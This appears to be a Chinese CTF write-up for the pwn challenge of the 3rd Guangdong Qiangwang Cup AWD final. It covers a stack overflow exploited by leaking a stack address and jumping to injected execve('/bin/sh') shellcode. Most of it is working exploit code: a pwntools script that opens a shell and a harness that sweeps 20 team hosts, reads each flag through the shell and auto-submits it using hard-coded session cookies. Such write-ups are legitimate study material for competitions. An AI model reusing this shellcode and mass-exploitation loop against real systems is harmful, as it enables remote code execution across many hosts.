第三届 广东省强网杯 线下决赛 pwn-AWD模式

第三届广东省强网杯的线下决赛,只有一道pwn题,而且是啥保护都没开的栈溢出,有pwn手的队伍都能秒patch,然后就是写好exp,十五分钟刷新一轮flag的时候跑一次打全场,全程咸鱼快睡着了都。。

题目分析

栈溢出，溢出 8 字节刚好能覆盖返回地址。程序中有给出栈地址，而且没开 NX 保护，所以我这里选择把 shellcode 写到栈上，再把返回地址覆盖为 shellcode 所在的那个栈地址就行了。

leak stack

stack overflow

完整EXP

exploit

from pwn import *

#elf = ELF('./pwn')
#libc = elf.libc #/lib/x86_64-linux-gnu/libc-2.23.so

# Target is x86-64 Linux; this only changes how the pwntools helpers used
# below (asm(), p64()) assemble and pack.
context(arch = 'amd64', os = 'linux')

def exp(IP, PORT):
    """Connect to the challenge service at IP:PORT, run the chain and return
    the still-open pwntools tube for the caller to talk to.

    Python 2 only: the payloads concatenate str with the output of asm()/p64(),
    which does not work under Python 3 (the AWD harness that imports this
    module is a python2 script).

    What the chain depends on, per the write-up: the "What?" read overruns a
    fixed-size stack buffer, the binary has no canary and no NX, and menu
    option 2 prints a stack address. Any one of a bounded read, a canary or
    NX breaks it — presumably the one-line patch the defending teams applied.
    """
    p = remote(IP, PORT)
    #p = process('./pwn')
    # Option 3 reaches the overflowing "What?" read.
    p.sendlineafter('Enter your choice:\n', '3')
    # First overflow. NOTE(review): its layout (0x28+8+4 bytes before the
    # final qword) differs from payload2's flat 0x38 pad; presumably tuned to
    # this binary, not verified from the page.
    payload1 = 'a'*0x28 + p64(0x12345678) + 'qqqq' + p64(0x400809)
    p.sendafter('What?', payload1)
    # Option 2 prints "It is magic: [0x" followed by 12 hex digits — a stack
    # address, taken here as where the next payload's buffer starts
    # (assumption of the write-up, confirmed by the final p64 below).
    p.sendlineafter('Enter your choice:\n', '2')
    p.recvuntil('It is magic: [0x')
    stack = int(p.recvn(12), 16)
    #log.success(hex(stack))
    shellcode_addr = stack
    # Hand-assembled bytes placed at the start of the buffer; the byte listing
    # at the end of this file documents the string they build at rsp.
    shellcode = ""
    #shellcode += asm('push 0')
    shellcode += asm('mov dword ptr [rsp], 0x6e69622f')
    shellcode += asm('mov dword ptr [rsp+4], 0x0068732f')

    shellcode += asm('mov rdi, rsp')
    shellcode += asm('xor rsi, rsi')
    shellcode += asm('xor rdx, rdx')
    shellcode += asm('xor rax, rax')
    shellcode += asm('mov rax, 59')
    shellcode += asm('syscall')
    # Pad the buffer to 0x38 and make the saved return address the leaked
    # stack address, i.e. the start of this buffer.
    payload2 = shellcode.ljust(0x38, '\0') + p64(shellcode_addr)
    #gdb.attach(p, 'b *0x400881\nb *0x400896')
    p.sendlineafter('Enter your choice:\n', '3')
    p.sendafter('What?', payload2)
    #print hex(len(shellcode))
    # A non-numeric choice presumably makes the menu function return, which
    # is what hands control to the overwritten return address.
    p.sendlineafter('Enter your choice:\n', 'a')
    return p

if __name__ == '__main__':
    # Local test run against a copy of the service; the AWD harness imports
    # exp() and supplies the target address itself.
    p = exp('127.0.0.1', 9527)
    p.interactive()


# 2f 62 69 6e 2f 73 68/bin/sh
#//bin/sh

打全场的exploit

#!/usr/bin/env python2
# -*- coding: utf-8 -*- #
from pwn import *
import time
import os
import requests
from exploit import *

def submit_flag(flag, token):
    """Post *flag* (with the team *token*) to the scoreboard's checkAnswer endpoint.

    Returns True when the board accepts the flag, False when it reports a
    wrong answer or a duplicate submission. Python 2: the two marker strings
    are plain (non-u) literals, so their backslash-u escapes are left
    unexpanded and are matched against the raw response body exactly as the
    server writes them.

    NOTE(review): the session cookies below are credentials hard-coded in
    source; loading them from the environment or an untracked file would keep
    them out of the repository.
    """
    endpoint = "http://100.100.100.10/checkAnswer"
    wrong_marker = '\u56de\u7b54\u9519\u8bef'
    duplicate_marker = '\u91cd\u590d\u4f5c\u7b54'
    form = {
        "answer": flag,
        "token": token,
        "rule": 2,
        "theme_id": 1,
        "type": 2,
    }
    session_cookies = {
        "XSRF-TOKEN": "eyJpdiI6Ik5wUFkrbHI3NUJIRlFtK0RKaWhBblE9PSIsInZhbHVlIjoiMHR4WVJ4dk1hSUxxbkp0MFY2b2FZWFhtTkkzTEx5MDFSY3M0SE9FNjJSeTB1NzF2ZTFDNjBOSFdXNlRvempzWSIsIm1hYyI6Ijg2YjMzMTMxYWE2NDYxYTAzM2JmZjY0ZWY3MzA1ZDIxMGM1MGEzYTJhNmQ5M2RjNjVmMTc2YTYxNzEyNTcyNTIifQ%3D%3D",
        "laravel_session": "eyJpdiI6InMwWFEyaVk3a29PVlRla0JiQUpBN1E9PSIsInZhbHVlIjoiXC9PaG85MGFnSzUxRkdSdUh2cHdSYVljekJ4U1NkcGNBS25kQUNkcXJuWUhKREVicGV0VzBaRHlVSVk3YmRZXC9ZIiwibWFjIjoiZjNkNjQyYjRhM2MyYzg2NDY5ZWMxYjE5MzRjZDVhNTNlOTk5OWRjYzU5OWY4M2FhNDI4NTMzM2NkNTI1ZjI2MyJ9",
    }
    reply = requests.post(endpoint, data=form, cookies=session_cookies, timeout=4)
    body = reply.content
    if wrong_marker in body:
        print "[T.T] Submit failed!"
        return False
    if duplicate_marker in body:
        print "[ :)] Submit Chong Fu!"
        return False
    print "[^.^] Submit success!"
    return True


def get_shell(ip='', port=0):
    """Run exp() against ip:port and hand back the resulting tube unchanged."""
    return exp(ip, port)

def attack(sleep_time=10):
    """One sweep over the game range: dump each box's flag to flag_list.txt
    and submit it, pausing sleep_time seconds between targets.

    Targets are 172.16.N.30 for N in 2..21. NOTE(review): `token` is not
    defined in this file nor in the exploit module shown above; unless it is
    supplied elsewhere, submit_flag() raises NameError, which the bare except
    below swallows — the flag is still written to the file first, but nothing
    gets submitted.
    """
    with open('./flag_list.txt', 'a+') as fd:
        # Whole-field sweep for AWD.
        #ip_list = ['172.16.20.4', '172.16.20.5','172.16.20.7', '172.16.20.9', '172.16.20.11']
        # while True:
        for IP1 in range(2,22):
            try:
                p = get_shell(ip='172.16.%d.30'%IP1, port=10000)
                #p = get_shell(ip='127.0.0.1', port=PORT)
                p.sendline('cat flag')
                p.recvuntil('flag{', drop=True)
                flag = p.recvuntil('}', drop=True)
                print '[^.^] flag' + flag
                # Persist before submitting so a submission error never loses the flag.
                fd.write('flag{'+flag+'}\n')
                submit_flag(flag, token)
                p.close()
            except:
                # NOTE(review): a bare except also catches KeyboardInterrupt and
                # hides which step failed; `except Exception as e:` plus printing
                # e would keep Ctrl-C working. p.close() is also skipped when a
                # later step fails, leaving that connection open.
                print '[T.T] FUCK'
            print "-"*0x50+'\n'
            time.sleep(sleep_time)

def main():
    """Entry point: a single sweep of the range with a 1 s pause per target."""
    attack(sleep_time=1)

if __name__ == '__main__':
    main()

效果如下
